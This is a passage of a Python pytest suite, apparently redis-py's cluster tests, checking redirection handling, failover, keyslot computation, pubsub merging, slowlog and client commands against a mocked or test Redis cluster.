mock_all_nodes_resp(r, "PONG")
assert r.ping(target_nodes=RedisCluster.RANDOM) is True
called_count = 0
for node in r.get_nodes():
conn = node.redis_connection.connection
if conn.read_response.called is True:
called_count += 1
assert called_count == 1
def test_execute_command_default_node(self, r):
"""
Test command execution without node flag is being executed on the
default node
"""
def_node = r.get_default_node()
mock_node_resp(def_node, "PONG")
assert r.ping() is True
conn = def_node.redis_connection.connection
assert conn.read_response.called
def test_ask_redirection(self, r):
"""
Test that the server handles ASK response.
At first call it should return a ASK ResponseError that will point
the client to the next server it should talk to.
Important thing to verify is that it tries to talk to the second node.
"""
redirect_node = r.get_nodes()[0]
with patch.object(Redis, "parse_response") as parse_response:
def ask_redirect_effect(connection, *args, **options):
def ok_response(connection, *args, **options):
assert connection.host == redirect_node.host
assert connection.port == redirect_node.port
return "MOCK_OK"
parse_response.side_effect = ok_response
raise AskError(f"12182 {redirect_node.host}:{redirect_node.port}")
parse_response.side_effect = ask_redirect_effect
assert r.execute_command("SET", "foo", "bar") == "MOCK_OK"
def test_moved_redirection(self, request):
"""
Test that the client handles MOVED response.
"""
moved_redirection_helper(request, failover=False)
def test_moved_redirection_after_failover(self, request):
"""
Test that the client handles MOVED response after a failover.
"""
moved_redirection_helper(request, failover=True)
def test_refresh_using_specific_nodes(self, request):
"""
Test making calls on specific nodes when the cluster has failed over to
another node
"""
node_7006 = ClusterNode(host=default_host, port=7006, server_type=PRIMARY)
node_7007 = ClusterNode(host=default_host, port=7007, server_type=PRIMARY)
with patch.object(Redis, "parse_response") as parse_response:
with patch.object(NodesManager, "initialize", autospec=True) as initialize:
with patch.multiple(
Connection, send_command=DEFAULT, connect=DEFAULT, can_read=DEFAULT
) as mocks:
# simulate 7006 as a failed node
def parse_response_mock(connection, command_name, **options):
if connection.port == 7006:
parse_response.failed_calls += 1
raise ClusterDownError(
"CLUSTERDOWN The cluster is "
"down. Use CLUSTER INFO for "
"more information"
)
elif connection.port == 7007:
parse_response.successful_calls += 1
def initialize_mock(self):
# start with all slots mapped to 7006
self.nodes_cache = {node_7006.name: node_7006}
self.default_node = node_7006
self.slots_cache = {}
for i in range(0, 16383):
self.slots_cache[i] = [node_7006]
# After the first connection fails, a reinitialize
# should follow the cluster to 7007
def map_7007(self):
self.nodes_cache = {node_7007.name: node_7007}
self.default_node = node_7007
self.slots_cache = {}
for i in range(0, 16383):
self.slots_cache[i] = [node_7007]
# Change initialize side effect for the second call
initialize.side_effect = map_7007
parse_response.side_effect = parse_response_mock
parse_response.successful_calls = 0
parse_response.failed_calls = 0
initialize.side_effect = initialize_mock
mocks["can_read"].return_value = False
mocks["send_command"].return_value = "MOCK_OK"
mocks["connect"].return_value = None
with patch.object(
CommandsParser, "initialize", autospec=True
) as cmd_parser_initialize:
def cmd_init_mock(self, r):
self.commands = {
"get": {
"name": "get",
"arity": 2,
"flags": ["readonly", "fast"],
"first_key_pos": 1,
"last_key_pos": 1,
"step_count": 1,
}
}
cmd_parser_initialize.side_effect = cmd_init_mock
rc = _get_client(RedisCluster, request, flushdb=False)
assert len(rc.get_nodes()) == 1
assert rc.get_node(node_name=node_7006.name) is not None
rc.get("foo")
# Cluster should now point to 7007, and there should be
# one failed and one successful call
assert len(rc.get_nodes()) == 1
assert rc.get_node(node_name=node_7007.name) is not None
assert rc.get_node(node_name=node_7006.name) is None
assert parse_response.failed_calls == 1
assert parse_response.successful_calls == 1
def test_reading_from_replicas_in_round_robin(self):
with patch.multiple(
Connection,
send_command=DEFAULT,
read_response=DEFAULT,
_connect=DEFAULT,
can_read=DEFAULT,
on_connect=DEFAULT,
) as mocks:
with patch.object(Redis, "parse_response") as parse_response:
def parse_response_mock_first(connection, *args, **options):
# Primary
assert connection.port == 7001
parse_response.side_effect = parse_response_mock_second
return "MOCK_OK"
def parse_response_mock_second(connection, *args, **options):
# Replica
assert connection.port == 7002
parse_response.side_effect = parse_response_mock_third
return "MOCK_OK"
def parse_response_mock_third(connection, *args, **options):
# Primary
assert connection.port == 7001
return "MOCK_OK"
# We don't need to create a real cluster connection but we
# do want RedisCluster.on_connect function to get called,
# so we'll mock some of the Connection's functions to allow it
parse_response.side_effect = parse_response_mock_first
mocks["send_command"].return_value = True
mocks["read_response"].return_value = "OK"
mocks["_connect"].return_value = True
mocks["can_read"].return_value = False
mocks["on_connect"].return_value = True
# Create a cluster with reading from replications
read_cluster = get_mocked_redis_client(
host=default_host, port=default_port, read_from_replicas=True
)
assert read_cluster.read_from_replicas is True
# Check that we read from the slot's nodes in a round robin
# matter.
# 'foo' belongs to slot 12182 and the slot's nodes are:
# [(127.0.0.1,7001,primary), (127.0.0.1,7002,replica)]
read_cluster.get("foo")
read_cluster.get("foo")
read_cluster.get("foo")
mocks["send_command"].assert_has_calls([call("READONLY")])
def test_keyslot(self, r):
"""
Test that method will compute correct key in all supported cases
"""
assert r.keyslot("foo") == 12182
assert r.keyslot("{foo}bar") == 12182
assert r.keyslot("{foo}") == 12182
assert r.keyslot(1337) == 4314
assert r.keyslot(125) == r.keyslot(b"125")
assert r.keyslot(125) == r.keyslot("\x31\x32\x35")
assert r.keyslot("大奖") == r.keyslot(b"\xe5\xa4\xa7\xe5\xa5\x96")
assert r.keyslot("大奖") == r.keyslot(b"\xe5\xa4\xa7\xe5\xa5\x96")
assert r.keyslot(1337.1234) == r.keyslot("1337.1234")
assert r.keyslot(1337) == r.keyslot("1337")
assert r.keyslot(b"abc") == r.keyslot("abc")
def test_get_node_name(self):
assert (
get_node_name(default_host, default_port)
== f"{default_host}:{default_port}"
)
def test_all_nodes(self, r):
"""
Set a list of nodes and it should be possible to iterate over all
"""
nodes = [node for node in r.nodes_manager.nodes_cache.values()]
for i, node in enumerate(r.get_nodes()):
assert node in nodes
def test_all_nodes_masters(self, r):
"""
Set a list of nodes with random primaries/replicas config and it shold
be possible to iterate over all of them.
"""
nodes = [
node
for node in r.nodes_manager.nodes_cache.values()
if node.server_type == PRIMARY
]
for node in r.get_primaries():
assert node in nodes
@pytest.mark.parametrize("error", RedisCluster.ERRORS_ALLOW_RETRY)
def test_cluster_down_overreaches_retry_attempts(self, error):
"""
When error that allows retry is thrown, test that we retry executing
the command as many times as configured in cluster_error_retry_attempts
and then raise the exception
"""
with patch.object(RedisCluster, "_execute_command") as execute_command:
def raise_error(target_node, *args, **kwargs):
execute_command.failed_calls += 1
raise error("mocked error")
execute_command.side_effect = raise_error
rc = get_mocked_redis_client(host=default_host, port=default_port)
with pytest.raises(error):
rc.get("bar")
assert execute_command.failed_calls == rc.cluster_error_retry_attempts
def test_user_on_connect_function(self, request):
"""
Test support in passing on_connect function by the user
"""
def on_connect(connection):
assert connection is not None
mock = Mock(side_effect=on_connect)
_get_client(RedisCluster, request, redis_connect_func=mock)
assert mock.called is True
def test_set_default_node_success(self, r):
"""
test successful replacement of the default cluster node
"""
default_node = r.get_default_node()
# get a different node
new_def_node = None
for node in r.get_nodes():
if node != default_node:
new_def_node = node
break
assert r.set_default_node(new_def_node) is True
assert r.get_default_node() == new_def_node
def test_set_default_node_failure(self, r):
"""
test failed replacement of the default cluster node
"""
default_node = r.get_default_node()
new_def_node = ClusterNode("1.1.1.1", 1111)
assert r.set_default_node(None) is False
assert r.set_default_node(new_def_node) is False
assert r.get_default_node() == default_node
def test_get_node_from_key(self, r):
"""
Test that get_node_from_key function returns the correct node
"""
key = "bar"
slot = r.keyslot(key)
slot_nodes = r.nodes_manager.slots_cache.get(slot)
primary = slot_nodes[0]
assert r.get_node_from_key(key, replica=False) == primary
replica = r.get_node_from_key(key, replica=True)
if replica is not None:
assert replica.server_type == REPLICA
assert replica in slot_nodes
@skip_if_redis_enterprise()
def test_not_require_full_coverage_cluster_down_error(self, r):
"""
When require_full_coverage is set to False (default client config) and not
all slots are covered, if one of the nodes has 'cluster-require_full_coverage'
config set to 'yes' some key-based commands should throw ClusterDownError
"""
node = r.get_node_from_key("foo")
missing_slot = r.keyslot("foo")
assert r.set("foo", "bar") is True
try:
assert all(r.cluster_delslots(missing_slot))
with pytest.raises(ClusterDownError):
r.exists("foo")
finally:
try:
# Add back the missing slot
assert r.cluster_addslots(node, missing_slot) is True
# Make sure we are not getting ClusterDownError anymore
assert r.exists("foo") == 1
except ResponseError as e:
if f"Slot {missing_slot} is already busy" in str(e):
# It can happen if the test failed to delete this slot
pass
else:
raise e
@pytest.mark.onlycluster
class TestClusterRedisCommands:
"""
Tests for RedisCluster unique commands
"""
def test_case_insensitive_command_names(self, r):
assert (
r.cluster_response_callbacks["cluster slots"]
== r.cluster_response_callbacks["CLUSTER SLOTS"]
)
def test_get_and_set(self, r):
# get and set can't be tested independently of each other
assert r.get("a") is None
byte_string = b"value"
integer = 5
unicode_string = chr(3456) + "abcd" + chr(3421)
assert r.set("byte_string", byte_string)
assert r.set("integer", 5)
assert r.set("unicode_string", unicode_string)
assert r.get("byte_string") == byte_string
assert r.get("integer") == str(integer).encode()
assert r.get("unicode_string").decode("utf-8") == unicode_string
def test_mget_nonatomic(self, r):
assert r.mget_nonatomic([]) == []
assert r.mget_nonatomic(["a", "b"]) == [None, None]
r["a"] = "1"
r["b"] = "2"
r["c"] = "3"
assert r.mget_nonatomic("a", "other", "b", "c") == [b"1", None, b"2", b"3"]
def test_mset_nonatomic(self, r):
d = {"a": b"1", "b": b"2", "c": b"3", "d": b"4"}
assert r.mset_nonatomic(d)
for k, v in d.items():
assert r[k] == v
def test_config_set(self, r):
assert r.config_set("slowlog-log-slower-than", 0)
def test_cluster_config_resetstat(self, r):
r.ping(target_nodes="all")
all_info = r.info(target_nodes="all")
prior_commands_processed = -1
for node_info in all_info.values():
prior_commands_processed = node_info["total_commands_processed"]
assert prior_commands_processed >= 1
r.config_resetstat(target_nodes="all")
all_info = r.info(target_nodes="all")
for node_info in all_info.values():
reset_commands_processed = node_info["total_commands_processed"]
assert reset_commands_processed < prior_commands_processed
def test_client_setname(self, r):
node = r.get_random_node()
r.client_setname("redis_py_test", target_nodes=node)
client_name = r.client_getname(target_nodes=node)
assert client_name == "redis_py_test"
def test_exists(self, r):
d = {"a": b"1", "b": b"2", "c": b"3", "d": b"4"}
r.mset_nonatomic(d)
assert r.exists(*d.keys()) == len(d)
def test_delete(self, r):
d = {"a": b"1", "b": b"2", "c": b"3", "d": b"4"}
r.mset_nonatomic(d)
assert r.delete(*d.keys()) == len(d)
assert r.delete(*d.keys()) == 0
def test_touch(self, r):
d = {"a": b"1", "b": b"2", "c": b"3", "d": b"4"}
r.mset_nonatomic(d)
assert r.touch(*d.keys()) == len(d)
def test_unlink(self, r):
d = {"a": b"1", "b": b"2", "c": b"3", "d": b"4"}
r.mset_nonatomic(d)
assert r.unlink(*d.keys()) == len(d)
# Unlink is non-blocking so we sleep before
# verifying the deletion
sleep(0.1)
assert r.unlink(*d.keys()) == 0
def test_pubsub_channels_merge_results(self, r):
nodes = r.get_nodes()
channels = []
pubsub_nodes = []
i = 0
for node in nodes:
channel = f"foo{i}"
# We will create different pubsub clients where each one is
# connected to a different node
p = r.pubsub(node)
pubsub_nodes.append(p)
p.subscribe(channel)
b_channel = channel.encode("utf-8")
channels.append(b_channel)
# Assert that each node returns only the channel it subscribed to
sub_channels = node.redis_connection.pubsub_channels()
if not sub_channels:
# Try again after a short sleep
sleep(0.3)
sub_channels = node.redis_connection.pubsub_channels()
assert sub_channels == [b_channel]
i += 1
# Assert that the cluster's pubsub_channels function returns ALL of
# the cluster's channels
result = r.pubsub_channels(target_nodes="all")
result.sort()
assert result == channels
def test_pubsub_numsub_merge_results(self, r):
nodes = r.get_nodes()
pubsub_nodes = []
channel = "foo"
b_channel = channel.encode("utf-8")
for node in nodes:
# We will create different pubsub clients where each one is
# connected to a different node
p = r.pubsub(node)
pubsub_nodes.append(p)
p.subscribe(channel)
# Assert that each node returns that only one client is subscribed
sub_chann_num = node.redis_connection.pubsub_numsub(channel)
if sub_chann_num == [(b_channel, 0)]:
sleep(0.3)
sub_chann_num = node.redis_connection.pubsub_numsub(channel)
assert sub_chann_num == [(b_channel, 1)]
# Assert that the cluster's pubsub_numsub function returns ALL clients
# subscribed to this channel in the entire cluster
assert r.pubsub_numsub(channel, target_nodes="all") == [(b_channel, len(nodes))]
def test_pubsub_numpat_merge_results(self, r):
nodes = r.get_nodes()
pubsub_nodes = []
pattern = "foo*"
for node in nodes:
# We will create different pubsub clients where each one is
# connected to a different node
p = r.pubsub(node)
pubsub_nodes.append(p)
p.psubscribe(pattern)
# Assert that each node returns that only one client is subscribed
sub_num_pat = node.redis_connection.pubsub_numpat()
if sub_num_pat == 0:
sleep(0.3)
sub_num_pat = node.redis_connection.pubsub_numpat()
assert sub_num_pat == 1
# Assert that the cluster's pubsub_numsub function returns ALL clients
# subscribed to this channel in the entire cluster
assert r.pubsub_numpat(target_nodes="all") == len(nodes)
@skip_if_server_version_lt("2.8.0")
def test_cluster_pubsub_channels(self, r):
p = r.pubsub()
p.subscribe("foo", "bar", "baz", "quux")
for i in range(4):
assert wait_for_message(p, timeout=0.5)["type"] == "subscribe"
expected = [b"bar", b"baz", b"foo", b"quux"]
assert all(
[channel in r.pubsub_channels(target_nodes="all") for channel in expected]
)
@skip_if_server_version_lt("2.8.0")
def test_cluster_pubsub_numsub(self, r):
p1 = r.pubsub()
p1.subscribe("foo", "bar", "baz")
for i in range(3):
assert wait_for_message(p1, timeout=0.5)["type"] == "subscribe"
p2 = r.pubsub()
p2.subscribe("bar", "baz")
for i in range(2):
assert wait_for_message(p2, timeout=0.5)["type"] == "subscribe"
p3 = r.pubsub()
p3.subscribe("baz")
assert wait_for_message(p3, timeout=0.5)["type"] == "subscribe"
channels = [(b"foo", 1), (b"bar", 2), (b"baz", 3)]
assert r.pubsub_numsub("foo", "bar", "baz", target_nodes="all") == channels
@skip_if_redis_enterprise()
def test_cluster_myid(self, r):
node = r.get_random_node()
myid = r.cluster_myid(node)
assert len(myid) == 40
@skip_if_redis_enterprise()
def test_cluster_slots(self, r):
mock_all_nodes_resp(r, default_cluster_slots)
cluster_slots = r.cluster_slots()
assert isinstance(cluster_slots, dict)
assert len(default_cluster_slots) == len(cluster_slots)
assert cluster_slots.get((0, 8191)) is not None
assert cluster_slots.get((0, 8191)).get("primary") == ("127.0.0.1", 7000)
@skip_if_server_version_lt("7.0.0")
@skip_if_redis_enterprise()
def test_cluster_shards(self, r):
cluster_shards = r.cluster_shards()
assert isinstance(cluster_shards, list)
assert isinstance(cluster_shards[0], dict)
attributes = [
"id",
"endpoint",
"ip",
"hostname",
"port",
"tls-port",
"role",
"replication-offset",
"health",
]
for x in cluster_shards:
assert list(x.keys()) == ["slots", "nodes"]
for node in x["nodes"]:
for attribute in node.keys():
assert attribute in attributes
@skip_if_redis_enterprise()
def test_cluster_addslots(self, r):
node = r.get_random_node()
mock_node_resp(node, "OK")
assert r.cluster_addslots(node, 1, 2, 3) is True
@skip_if_server_version_lt("7.0.0")
@skip_if_redis_enterprise()
def test_cluster_addslotsrange(self, r):
node = r.get_random_node()
mock_node_resp(node, "OK")
assert r.cluster_addslotsrange(node, 1, 5)
@skip_if_redis_enterprise()
def test_cluster_countkeysinslot(self, r):
node = r.nodes_manager.get_node_from_slot(1)
mock_node_resp(node, 2)
assert r.cluster_countkeysinslot(1) == 2
def test_cluster_count_failure_report(self, r):
mock_all_nodes_resp(r, 0)
assert r.cluster_count_failure_report("node_0") == 0
@skip_if_redis_enterprise()
def test_cluster_delslots(self):
cluster_slots = [
[
0,
8191,
["127.0.0.1", 7000, "node_0"],
],
[
8192,
16383,
["127.0.0.1", 7001, "node_1"],
],
]
r = get_mocked_redis_client(
host=default_host, port=default_port, cluster_slots=cluster_slots
)
mock_all_nodes_resp(r, "OK")
node0 = r.get_node(default_host, 7000)
node1 = r.get_node(default_host, 7001)
assert r.cluster_delslots(0, 8192) == [True, True]
assert node0.redis_connection.connection.read_response.called
assert node1.redis_connection.connection.read_response.called
@skip_if_server_version_lt("7.0.0")
@skip_if_redis_enterprise()
def test_cluster_delslotsrange(self, r):
node = r.get_random_node()
mock_node_resp(node, "OK")
r.cluster_addslots(node, 1, 2, 3, 4, 5)
assert r.cluster_delslotsrange(1, 5)
@skip_if_redis_enterprise()
def test_cluster_failover(self, r):
node = r.get_random_node()
mock_node_resp(node, "OK")
assert r.cluster_failover(node) is True
assert r.cluster_failover(node, "FORCE") is True
assert r.cluster_failover(node, "TAKEOVER") is True
with pytest.raises(RedisError):
r.cluster_failover(node, "FORCT")
@skip_if_redis_enterprise()
def test_cluster_info(self, r):
info = r.cluster_info()
assert isinstance(info, dict)
assert info["cluster_state"] == "ok"
@skip_if_redis_enterprise()
def test_cluster_keyslot(self, r):
mock_all_nodes_resp(r, 12182)
assert r.cluster_keyslot("foo") == 12182
@skip_if_redis_enterprise()
def test_cluster_meet(self, r):
node = r.get_default_node()
mock_node_resp(node, "OK")
assert r.cluster_meet("127.0.0.1", 6379) is True
@skip_if_redis_enterprise()
def test_cluster_nodes(self, r):
response = (
"c8253bae761cb1ecb2b61857d85dfe455a0fec8b 172.17.0.7:7006 "
"slave aa90da731f673a99617dfe930306549a09f83a6b 0 "
"1447836263059 5 connected\n"
"9bd595fe4821a0e8d6b99d70faa660638a7612b3 172.17.0.7:7008 "
"master - 0 1447836264065 0 connected\n"
"aa90da731f673a99617dfe930306549a09f83a6b 172.17.0.7:7003 "
"myself,master - 0 0 2 connected 5461-10922\n"
"1df047e5a594f945d82fc140be97a1452bcbf93e 172.17.0.7:7007 "
"slave 19efe5a631f3296fdf21a5441680f893e8cc96ec 0 "
"1447836262556 3 connected\n"
"4ad9a12e63e8f0207025eeba2354bcf4c85e5b22 172.17.0.7:7005 "
"master - 0 1447836262555 7 connected 0-5460\n"
"19efe5a631f3296fdf21a5441680f893e8cc96ec 172.17.0.7:7004 "
"master - 0 1447836263562 3 connected 10923-16383\n"
"fbb23ed8cfa23f17eaf27ff7d0c410492a1093d6 172.17.0.7:7002 "
"master,fail - 1447829446956 1447829444948 1 disconnected\n"
)
mock_all_nodes_resp(r, response)
nodes = r.cluster_nodes()
assert len(nodes) == 7
assert nodes.get("172.17.0.7:7006") is not None
assert (
nodes.get("172.17.0.7:7006").get("node_id")
== "c8253bae761cb1ecb2b61857d85dfe455a0fec8b"
)
@skip_if_redis_enterprise()
def test_cluster_nodes_importing_migrating(self, r):
response = (
"488ead2fcce24d8c0f158f9172cb1f4a9e040fe5 127.0.0.1:16381@26381 "
"master - 0 1648975557664 3 connected 10923-16383\n"
"8ae2e70812db80776f739a72374e57fc4ae6f89d 127.0.0.1:16380@26380 "
"master - 0 1648975555000 2 connected 1 5461-10922 ["
"2-<-ed8007ccfa2d91a7b76f8e6fba7ba7e257034a16]\n"
"ed8007ccfa2d91a7b76f8e6fba7ba7e257034a16 127.0.0.1:16379@26379 "
"myself,master - 0 1648975556000 1 connected 0 2-5460 ["
"2->-8ae2e70812db80776f739a72374e57fc4ae6f89d]\n"
)
mock_all_nodes_resp(r, response)
nodes = r.cluster_nodes()
assert len(nodes) == 3
node_16379 = nodes.get("127.0.0.1:16379")
node_16380 = nodes.get("127.0.0.1:16380")
node_16381 = nodes.get("127.0.0.1:16381")
assert node_16379.get("migrations") == [
{
"slot": "2",
"node_id": "8ae2e70812db80776f739a72374e57fc4ae6f89d",
"state": "migrating",
}
]
assert node_16379.get("slots") == [["0"], ["2", "5460"]]
assert node_16380.get("migrations") == [
{
"slot": "2",
"node_id": "ed8007ccfa2d91a7b76f8e6fba7ba7e257034a16",
"state": "importing",
}
]
assert node_16380.get("slots") == [["1"], ["5461", "10922"]]
assert node_16381.get("slots") == [["10923", "16383"]]
assert node_16381.get("migrations") == []
@skip_if_redis_enterprise()
def test_cluster_replicate(self, r):
node = r.get_random_node()
all_replicas = r.get_replicas()
mock_all_nodes_resp(r, "OK")
assert r.cluster_replicate(node, "c8253bae761cb61857d") is True
results = r.cluster_replicate(all_replicas, "c8253bae761cb61857d")
if isinstance(results, dict):
for res in results.values():
assert res is True
else:
assert results is True
@skip_if_redis_enterprise()
def test_cluster_reset(self, r):
mock_all_nodes_resp(r, "OK")
assert r.cluster_reset() is True
assert r.cluster_reset(False) is True
all_results = r.cluster_reset(False, target_nodes="all")
for res in all_results.values():
assert res is True
@skip_if_redis_enterprise()
def test_cluster_save_config(self, r):
node = r.get_random_node()
all_nodes = r.get_nodes()
mock_all_nodes_resp(r, "OK")
assert r.cluster_save_config(node) is True
all_results = r.cluster_save_config(all_nodes)
for res in all_results.values():
assert res is True
@skip_if_redis_enterprise()
def test_cluster_get_keys_in_slot(self, r):
response = ["{foo}1", "{foo}2"]
node = r.nodes_manager.get_node_from_slot(12182)
mock_node_resp(node, response)
keys = r.cluster_get_keys_in_slot(12182, 4)
assert keys == response
@skip_if_redis_enterprise()
def test_cluster_set_config_epoch(self, r):
mock_all_nodes_resp(r, "OK")
assert r.cluster_set_config_epoch(3) is True
all_results = r.cluster_set_config_epoch(3, target_nodes="all")
for res in all_results.values():
assert res is True
@skip_if_redis_enterprise()
def test_cluster_setslot(self, r):
node = r.get_random_node()
mock_node_resp(node, "OK")
assert r.cluster_setslot(node, "node_0", 1218, "IMPORTING") is True
assert r.cluster_setslot(node, "node_0", 1218, "NODE") is True
assert r.cluster_setslot(node, "node_0", 1218, "MIGRATING") is True
with pytest.raises(RedisError):
r.cluster_failover(node, "STABLE")
with pytest.raises(RedisError):
r.cluster_failover(node, "STATE")
def test_cluster_setslot_stable(self, r):
node = r.nodes_manager.get_node_from_slot(12182)
mock_node_resp(node, "OK")
assert r.cluster_setslot_stable(12182) is True
assert node.redis_connection.connection.read_response.called
@skip_if_redis_enterprise()
def test_cluster_replicas(self, r):
response = [
b"01eca22229cf3c652b6fca0d09ff6941e0d2e3 "
b"127.0.0.1:6377@16377 slave "
b"52611e796814b78e90ad94be9d769a4f668f9a 0 "
b"1634550063436 4 connected",
b"r4xfga22229cf3c652b6fca0d09ff69f3e0d4d "
b"127.0.0.1:6378@16378 slave "
b"52611e796814b78e90ad94be9d769a4f668f9a 0 "
b"1634550063436 4 connected",
]
mock_all_nodes_resp(r, response)
replicas = r.cluster_replicas("52611e796814b78e90ad94be9d769a4f668f9a")
assert replicas.get("127.0.0.1:6377") is not None
assert replicas.get("127.0.0.1:6378") is not None
assert (
replicas.get("127.0.0.1:6378").get("node_id")
== "r4xfga22229cf3c652b6fca0d09ff69f3e0d4d"
)
@skip_if_server_version_lt("7.0.0")
def test_cluster_links(self, r):
node = r.get_random_node()
res = r.cluster_links(node)
links_to = sum(x.count("to") for x in res)
links_for = sum(x.count("from") for x in res)
assert links_to == links_for
for i in range(0, len(res) - 1, 2):
assert res[i][3] == res[i + 1][3]
@skip_if_redis_enterprise()
def test_readonly(self):
r = get_mocked_redis_client(host=default_host, port=default_port)
mock_all_nodes_resp(r, "OK")
assert r.readonly() is True
all_replicas_results = r.readonly(target_nodes="replicas")
for res in all_replicas_results.values():
assert res is True
for replica in r.get_replicas():
assert replica.redis_connection.connection.read_response.called
@skip_if_redis_enterprise()
def test_readwrite(self):
r = get_mocked_redis_client(host=default_host, port=default_port)
mock_all_nodes_resp(r, "OK")
assert r.readwrite() is True
all_replicas_results = r.readwrite(target_nodes="replicas")
for res in all_replicas_results.values():
assert res is True
for replica in r.get_replicas():
assert replica.redis_connection.connection.read_response.called
@skip_if_redis_enterprise()
def test_bgsave(self, r):
assert r.bgsave()
sleep(0.3)
assert r.bgsave(True)
def test_info(self, r):
# Map keys to same slot
r.set("x{1}", 1)
r.set("y{1}", 2)
r.set("z{1}", 3)
# Get node that handles the slot
slot = r.keyslot("x{1}")
node = r.nodes_manager.get_node_from_slot(slot)
# Run info on that node
info = r.info(target_nodes=node)
assert isinstance(info, dict)
assert info["db0"]["keys"] == 3
def _init_slowlog_test(self, r, node):
slowlog_lim = r.config_get("slowlog-log-slower-than", target_nodes=node)
assert r.config_set("slowlog-log-slower-than", 0, target_nodes=node) is True
return slowlog_lim["slowlog-log-slower-than"]
def _teardown_slowlog_test(self, r, node, prev_limit):
assert (
r.config_set("slowlog-log-slower-than", prev_limit, target_nodes=node)
is True
)
def test_slowlog_get(self, r, slowlog):
unicode_string = chr(3456) + "abcd" + chr(3421)
node = r.get_node_from_key(unicode_string)
slowlog_limit = self._init_slowlog_test(r, node)
assert r.slowlog_reset(target_nodes=node)
r.get(unicode_string)
slowlog = r.slowlog_get(target_nodes=node)
assert isinstance(slowlog, list)
commands = [log["command"] for log in slowlog]
get_command = b" ".join((b"GET", unicode_string.encode("utf-8")))
assert get_command in commands
assert b"SLOWLOG RESET" in commands
# the order should be ['GET <uni string>', 'SLOWLOG RESET'],
# but if other clients are executing commands at the same time, there
# could be commands, before, between, or after, so just check that
# the two we care about are in the appropriate order.
assert commands.index(get_command) < commands.index(b"SLOWLOG RESET")
# make sure other attributes are typed correctly
assert isinstance(slowlog[0]["start_time"], int)
assert isinstance(slowlog[0]["duration"], int)
# rollback the slowlog limit to its original value
self._teardown_slowlog_test(r, node, slowlog_limit)
def test_slowlog_get_limit(self, r, slowlog):
assert r.slowlog_reset()
node = r.get_node_from_key("foo")
slowlog_limit = self._init_slowlog_test(r, node)
r.get("foo")
slowlog = r.slowlog_get(1, target_nodes=node)
assert isinstance(slowlog, list)
# only one command, based on the number we passed to slowlog_get()
assert len(slowlog) == 1
self._teardown_slowlog_test(r, node, slowlog_limit)
def test_slowlog_length(self, r, slowlog):
r.get("foo")
node = r.nodes_manager.get_node_from_slot(key_slot(b"foo"))
slowlog_len = r.slowlog_len(target_nodes=node)
assert isinstance(slowlog_len, int)
def test_time(self, r):
t = r.time(target_nodes=r.get_primaries()[0])
assert len(t) == 2
assert isinstance(t[0], int)
assert isinstance(t[1], int)
@skip_if_server_version_lt("4.0.0")
def test_memory_usage(self, r):
r.set("foo", "bar")
assert isinstance(r.memory_usage("foo"), int)
@skip_if_server_version_lt("4.0.0")
@skip_if_redis_enterprise()
def test_memory_malloc_stats(self, r):
assert r.memory_malloc_stats()
@skip_if_server_version_lt("4.0.0")
@skip_if_redis_enterprise()
def test_memory_stats(self, r):
# put a key into the current db to make sure that "db.<current-db>"
# has data
r.set("foo", "bar")
node = r.nodes_manager.get_node_from_slot(key_slot(b"foo"))
stats = r.memory_stats(target_nodes=node)
assert isinstance(stats, dict)
for key, value in stats.items():
if key.startswith("db."):
assert isinstance(value, dict)
@skip_if_server_version_lt("4.0.0")
def test_memory_help(self, r):
with pytest.raises(NotImplementedError):
r.memory_help()
@skip_if_server_version_lt("4.0.0")
def test_memory_doctor(self, r):
with pytest.raises(NotImplementedError):
r.memory_doctor()
@skip_if_redis_enterprise()
def test_lastsave(self, r):
node = r.get_primaries()[0]
assert isinstance(r.lastsave(target_nodes=node), datetime.datetime)
def test_cluster_echo(self, r):
node = r.get_primaries()[0]
assert r.echo("foo bar", target_nodes=node) == b"foo bar"
@skip_if_server_version_lt("1.0.0")
def test_debug_segfault(self, r):
with pytest.raises(NotImplementedError):
r.debug_segfault()
def test_config_resetstat(self, r):
node = r.get_primaries()[0]
r.ping(target_nodes=node)
prior_commands_processed = int(
r.info(target_nodes=node)["total_commands_processed"]
)
assert prior_commands_processed >= 1
r.config_resetstat(target_nodes=node)
reset_commands_processed = int(
r.info(target_nodes=node)["total_commands_processed"]
)
assert reset_commands_processed < prior_commands_processed
@skip_if_server_version_lt("6.2.0")
def test_client_trackinginfo(self, r):
node = r.get_primaries()[0]
res = r.client_trackinginfo(target_nodes=node)
assert len(res) > 2
assert "prefixes" in res
@skip_if_server_version_lt("2.9.50")
def test_client_pause(self, r):
node = r.get_primaries()[0]
assert r.client_pause(1, target_nodes=node)
assert r.client_pause(timeout=1, target_nodes=node)
with pytest.raises(RedisError):
r.client_pause(timeout="not an integer", target_nodes=node)
@skip_if_server_version_lt("6.2.0")
@skip_if_redis_enterprise()
def test_client_unpause(self, r):
assert r.client_unpause()
@skip_if_server_version_lt("5.0.0")
def test_client_id(self, r):
node = r.get_primaries()[0]
assert r.client_id(target_nodes=node) > 0
@skip_if_server_version_lt("5.0.0")
def test_client_unblock(self, r):
node = r.get_primaries()[0]
myid = r.client_id(target_nodes=node)
assert not r.client_unblock(myid, target_nodes=node)
assert not r.client_unblock(myid, error=True, target_nodes=node)
assert not r.client_unblock(myid, error=False, target_nodes=node)
@skip_if_server_version_lt("6.0.0")
def test_client_getredir(self, r):
node = r.get_primaries()[0]
assert isinstance(r.client_getredir(target_nodes=node), int)
assert r.client_getredir(target_nodes=node) == -1
@skip_if_server_version_lt("6.2.0")
def test_client_info(self, r):
node = r.get_primaries()[0]
info = r.client_info(target_nodes=node)
assert isinstance(info, dict)
assert "addr" in info
@skip_if_server_version_lt("2.6.9")
def test_client_kill(self, r, r2):
node = r.get_primaries()[0]
r.client_setname("redis-py-c1", target_nodes="all")
r2.client_setname("redis-py-c2", target_nodes="all")
clients = [
client
for client in r.client_list(target_nodes=node)
if client.get("name") in ["redis-py-c1", "redis-py-c2"]
]
assert len(clients) == 2
clients_by_name = {client.get("name"): client for client in clients}
client_addr = clients_by_name["redis-py-c2"].get("addr")
assert r.client_kill(client_addr, target_nodes=node) is True
clients = [
client
for client in r.client_list(target_nodes=node)
if client.get("name") in ["redis-py-c1", "redis-py-c2"]
]
assert len(clients) == 1
assert clients[0].get("name") == "redis-py-c1"
@skip_if_server_version_lt("2.6.0")
def test_cluster_bitop_not_empty_string(self, r):
r["{foo}a"] = ""
r.bitop("not", "{foo}r", "{foo}a")
assert r.get("{foo}r") is None
@skip_if_server_version_lt("2.6.0")
def test_cluster_bitop_not(self, r):
test_str = b"\xAA\x00\xFF\x55"
correct = ~0xAA00FF55 & 0xFFFFFFFF
r["{foo}a"] = test_str
r.bitop("not", "{foo}r", "{foo}a")
